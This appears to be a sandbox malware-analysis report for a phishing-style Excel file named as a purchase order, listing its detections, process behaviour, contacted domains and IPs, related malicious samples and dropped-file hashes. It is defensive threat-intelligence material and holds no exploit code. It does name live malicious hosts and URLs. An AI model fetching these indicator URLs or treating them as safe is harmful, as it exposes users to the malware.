Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PURCHASE ORDER 5172025.xla.xlsxStream path 'MBD00A6776E/Package' entropy: 7.99503474609 (max. 8.0)
Source: PURCHASE ORDER 5172025.xla.xlsxStream path 'Workbook' entropy: 7.99545252584 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 967Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts3
Exploitation for Client Execution
1
Scripting
1
Process Injection
3
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Virtualization/Sandbox Evasion
Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Process Injection
Security Account Manager1
Application Window Discovery
SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading
LSA Secrets2
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Extra Window Memory Injection
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1648273 Sample: PURCHASE ORDER 5172025.xla.xlsx Startdate: 25/03/2025 Architecture: WINDOWS Score: 48 21 t.emobility.energy 2->21 23 star-azurefd-prod.trafficmanager.net 2->23 25 7 other IPs or domains 2->25 31 Multi AV Scanner detection for submitted file 2->31 7 EXCEL.EXE 504 80 2->7         started        11 appidpolicyconverter.exe 1 2->11         started        13 EXCEL.EXE 23 42 2->13         started        signatures3 process4 dnsIp5 27 s-part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49730, 49731 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->27 29 host1.emobility.energy 162.19.137.157, 443, 49723, 49724 CENTURYLINK-US-LEGACY-QWESTUS United States 7->29 19 C:\...\~$PURCHASE ORDER 5172025.xla.xlsx, data 7->19 dropped 15 splwow64.exe 1 7->15         started        17 conhost.exe 11->17         started        file6 process7

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
PURCHASE ORDER 5172025.xla.xlsx29%VirustotalBrowse
PURCHASE ORDER 5172025.xla.xlsx22%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://t.emobility.energy/4040%Avira URL Cloudsafe
https://t.emobility.energy/kqQ8bIi0%Avira URL Cloudsafe
https://t.emobility.energy/kqQ8bI0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0012.t-0009.t-msedge.net
13.107.246.40
truefalse
    high
    host1.emobility.energy
    162.19.137.157
    truefalse
      high
      a726.dscd.akamai.net
      23.44.136.151
      truefalse
        high
        s-0005.dual-s-msedge.net
        52.123.129.14
        truefalse
          high
          otelrules.svc.static.microsoft
          unknown
          unknownfalse
            high
            t.emobility.energy
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://t.emobility.energy/404false
              • Avira URL Cloud: safe
              unknown
              https://t.emobility.energy/kqQ8bIfalse
              • Avira URL Cloud: safe
              unknown
              https://otelrules.svc.static.microsoft/rules/rule170146v0s19.xmlfalse
                high
                https://otelrules.svc.static.microsoft/rules/rule120201v19s19.xmlfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://t.emobility.energy/kqQ8bIiPURCHASE ORDER 5172025.xla.xlsxfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  13.107.246.40
                  s-part-0012.t-0009.t-msedge.netUnited States
                  8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                  162.19.137.157
                  host1.emobility.energyUnited States
                  209CENTURYLINK-US-LEGACY-QWESTUSfalse
                  Joe Sandbox version:42.0.0 Malachite
                  Analysis ID:1648273
                  Start date and time:2025-03-25 17:49:09 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 51s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                  Run name:Potential for more IOCs and behavior
                  Number of analysed new started processes analysed:23
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • GSI enabled (VBA)
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:PURCHASE ORDER 5172025.xla.xlsx
                  Detection:MAL
                  Classification:mal48.winXLSX@6/9@2/2
                  EGA Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 52.109.6.53, 52.109.4.7, 52.109.13.127, 52.168.117.175, 52.109.8.89, 52.168.117.168, 172.202.163.200, 52.123.129.14, 20.190.135.16, 184.31.69.3, 20.42.73.28, 23.44.136.151, 23.44.136.179
                  • Excluded domains from analysis (whitelisted): us1.odcsm1.live.com.akadns.net, odc.officeapps.live.com, slscr.update.microsoft.com, res-1.cdn.office.net, cus-config.officeapps.live.com, mobile.events.data.microsoft.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, eus2-azsc-config.officeapps.live.com, officeclient.microsoft.com, osiprod-eus2-bronze-azsc-000.eastus2.cloudapp.azure.com, c.pki.goog, assets.msn.com, ecs.office.com, fs.microsoft.com, eus-azsc-000.roaming.officeapps.live.com, prod.configsvc1.live.com.akadns.net, uci.cdn.office.net, ctldl.windowsupdate.com, onedscolprdeus19.eastus.cloudapp.azure.com, prod.roaming1.live.com.akadns.net, res-stls-prod.edgesuite.net, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, eus2-azsc-000.odc.officeapps.live.com, res-prod.trafficmanager.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, onedscolprdeus07.eastus.cloudapp.azure.com, ecs.office.trafficmanager.net, res.cdn.office.net, prod.odcsm1.l
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtCreateKey calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                  • Report size getting too big, too many NtSetValueKey calls found.
                  TimeTypeDescription
                  12:51:17API Interceptor1010x Sleep call for process: splwow64.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                  • www.aib.gov.uk/
                  NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                  • 2s.gg/3zs
                  PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                  • 2s.gg/42Q
                  06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                  • 2s.gg/3zk
                  Quotation.xlsGet hashmaliciousUnknownBrowse
                  • 2s.gg/3zM
                  162.19.137.157PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                    Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                      Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                        PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                          BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                            PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                              BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                                PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                  SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    s-0005.dual-s-msedge.netPURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 52.123.128.14
                                    Purchase Order 40360414.docGet hashmaliciousUnknownBrowse
                                    • 52.123.128.14
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 52.123.129.14
                                    Purchase Order 40360414.docGet hashmaliciousUnknownBrowse
                                    • 52.123.128.14
                                    PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 52.123.129.14
                                    Shitstain.exeGet hashmaliciousAnarchyGrabber, AsyncRAT, DBatLoader, Discord Token Stealer, FritzFrog, HawkEye, LokibotBrowse
                                    • 52.123.128.14
                                    25 03 2025 Legal Notice Presentation.pptxGet hashmaliciousUnknownBrowse
                                    • 52.123.129.14
                                    25 03 2025 Legal Notice Presentation.pptxGet hashmaliciousUnknownBrowse
                                    • 52.123.128.14
                                    Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msgGet hashmaliciousUnknownBrowse
                                    • 52.123.129.14
                                    host1.emobility.energyPURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    a726.dscd.akamai.netPURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 23.44.136.185
                                    Purchase Order 40360414.docGet hashmaliciousUnknownBrowse
                                    • 23.44.136.186
                                    Purchase Order 40360414.docGet hashmaliciousUnknownBrowse
                                    • 23.44.136.133
                                    25 03 2025 Legal Notice Presentation.pptxGet hashmaliciousUnknownBrowse
                                    • 23.44.136.179
                                    https://1drv.ms/o/c/8fc032da5fada757/EgEHU26Ga4FAl_1Su2lfpkUBqQItqpp0mP4_5cipPDmMcg?e=PyJVMiGet hashmaliciousUnknownBrowse
                                    • 23.44.136.155
                                    ProLab TT COPY for Proforma Invoice PLDS24344.docxGet hashmaliciousUnknownBrowse
                                    • 23.57.90.78
                                    quotation_1.xlsxGet hashmaliciousUnknownBrowse
                                    • 23.57.90.74
                                    Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                    • 23.57.90.76
                                    Sales Contract_1.docxGet hashmaliciousUnknownBrowse
                                    • 23.57.90.80
                                    https://1drv.ms/o/s!Aij0JRNQrbnneSfOXvmQkoge4b0?e=GSyDcyGet hashmaliciousUnknownBrowse
                                    • 23.44.133.49
                                    s-part-0012.t-0009.t-msedge.netPURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    http://loginmlcrosoftonline365.utzsnacks.com.ribeiroautocapas.com.br/cgi-bin/reset/authorize?email=priceandpromosupport@utzsnacks.comGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.40
                                    AliareV0.1.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                    • 13.107.246.40
                                    Review requested on PROJECT_PROPOSAL_Mutual_NDA_25.03.25_PDF (107Ko).msgGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    https://x.to0wfnubykn8.ru/hjkewtr/hgjtyu.htmlGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Get hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                    • 13.107.246.40
                                    Invoice_charles.mesquita_PaymentUpdate.htmlGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.40
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CENTURYLINK-US-LEGACY-QWESTUSPURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    arm7.elfGet hashmaliciousOkiruBrowse
                                    • 97.112.45.135
                                    https://promo-offer.site/tnf_ptGet hashmaliciousUnknownBrowse
                                    • 162.19.138.82
                                    https://antiphishing.vadesecure.com/v4?f=NFZ1OXFVNUpJaXhxbWN3aw79TqTxGVr5HS_rj8xy-Dtt3WuOYgiNsT7kSrCL4neS&i=dnZZY1BRdGVud2p5a3J2MkXgKVQslibyjliaROaA9Kc&k=ylKZ&r=eVhRazAzQWpzQlVhVVRabfl7Btopt7tCs6Jhtvvo_JQliQyVoVTnThNthFfLLOv7XziSix9lmqfR7qqdZtpsOw&s=427052c2cb55a4ea4f9c70929c499bda58414514c5d12af8c66341946b20b817&u=https%3A%2F%2Fzmk5ybt5uw.us-east-1.awsapprunner.com%2F%23Xavier.Regnault%40chantiers-atlantique.comGet hashmaliciousHTMLPhisherBrowse
                                    • 162.19.59.195
                                    Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 162.19.137.157
                                    MICROSOFT-CORP-MSN-AS-BLOCKUSPURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    arm.elfGet hashmaliciousGafgyt, OkiruBrowse
                                    • 20.192.11.71
                                    ppc.elfGet hashmaliciousOkiruBrowse
                                    • 40.122.145.102
                                    m68k.elfGet hashmaliciousGafgyt, OkiruBrowse
                                    • 51.120.229.61
                                    x86.elfGet hashmaliciousOkiruBrowse
                                    • 20.36.42.212
                                    82#U0576.exeGet hashmaliciousUnknownBrowse
                                    • 40.126.29.15
                                    http://loginmlcrosoftonline365.utzsnacks.com.ribeiroautocapas.com.br/cgi-bin/reset/authorize?email=priceandpromosupport@utzsnacks.comGet hashmaliciousHTMLPhisherBrowse
                                    • 13.107.246.72
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    258a5a1e95b8a911872bae9081526644PURCHASE ORDER 420-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    quotation_1.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    Untitled_20250325.docx.docGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    PO#45028.xlam.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    Nuevo comando_BR WJO-3-24-2025.xlam.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    BL 248436935 CNTR MRKU9180226.docx.docGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    PURCHASE ORDER 5172025.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    SecuriteInfo.com.Other.Malware-gen.24773.2907.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    CMR ReF 15200477813.docx.docGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    PRE#U00c7O - RFQ 674441-76450.xla.xlsxGet hashmaliciousUnknownBrowse
                                    • 13.107.246.40
                                    No context
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):118
                                    Entropy (8bit):3.5700810731231707
                                    Encrypted:false
                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                    MD5:573220372DA4ED487441611079B623CD
                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):8.112143835430977E-5
                                    Encrypted:false
                                    SSDEEP:3:Tuekk9NJtHFfs1XsExe/t:qeVJ8
                                    MD5:AFDEAC461EEC32D754D8E6017E845D21
                                    SHA1:5D0874C19B70638A0737696AEEE55BFCC80D7ED8
                                    SHA-256:3A96B02F6A09F6A6FAC2A44A5842FF9AEB17EB4D633E48ABF6ADDF6FB447C7E2
                                    SHA-512:CAB6B8F9FFDBD80210F42219BAC8F1124D6C0B6995C5128995F7F48CED8EF0F2159EA06A2CD09B1FDCD409719F94A7DB437C708D3B1FDA01FDC80141A4595FC7
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):71
                                    Entropy (8bit):4.3462513114457515
                                    Encrypted:false
                                    SSDEEP:3:Tuekk9NJtHFfs1XsExen:qeVJ8u
                                    MD5:8F4510F128F81A8BAF2A345D00F7E30C
                                    SHA1:8C711E6C484881ECDC83B6BDAC41C7A19EDE9C37
                                    SHA-256:15AA8B35FC5F139EF0B0FBC641CAA862AED19674625B81D1DC63467BC0AAFED9
                                    SHA-512:78695E5E2337703757903B8452E31A98F860022B04972651212C3004FEBE29017380A8BCA9FCCFD935DE00D8BD73AA556C30A3CEA5FC76E7ADF7E7763D68E78F
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:ASCII text, with very long lines (28677), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.21642373320021804
                                    Encrypted:false
                                    SSDEEP:1536:/RxNgYuqWKjSPXs7NqTf10YhElCCyjj4wT8W2Fs7v2i1/2vmcnyzJtoO+PTgEjXk:f+XLd0YnCyDR0W288B9ZBr7
                                    MD5:FF4F8E88E02001D667DB23A6E7EEA175
                                    SHA1:F94E4AF746849E075F9AD23F36080B14169C04B3
                                    SHA-256:76319F389920E2A78041ED938CAB9390E21C3B4A6056362ABE7147AC07F9B459
                                    SHA-512:D0CE7FC9F89BB7BA4E0DAD97B47DF859CABEC3F30DBF850349D9E84DB7CBC12CDC0662CE6C375BE05CC07621DE39369B2214E65487091F920E951B0D5105D081
                                    Malicious:false
                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..03/25/2025 16:50:17.372.EXCEL (0x1FC0).0x1D10.Microsoft Excel.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Experimentation.FeatureQueryBatched","Flags":33777005812056321,"InternalSequenceNumber":17,"Time":"2025-03-25T16:50:17.372Z","Data.Sequence":0,"Data.Count":128,"Data.Features":"[ { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.TrackCPSWrites\", \"V\" : false, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:50:16.5602376Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Telemetry.CPSMaxWrites\", \"V\" : 2, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:50:16.5602376Z\", \"C\" : \"33\", \"Q\" : 0.0, \"M\" : 0, \"F\" : 5 }, { \"ID\" : 1, \"N\" : \"Microsoft.Office.Word.UAEOnSafeModeEnabled\", \"V\" : true, \"S\" : 1, \"P\" : 0, \"T\" : \"2025-03-25T16:50:16.5602376Z\", \"C\" : \"\", \"Q\" : 15.0, \"M\" : 0, \"F\" : 5, \"G\" : \"Opt\" }, { \"ID\" : 1, \
                                    Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):20971520
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                                    SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                                    SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                                    SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
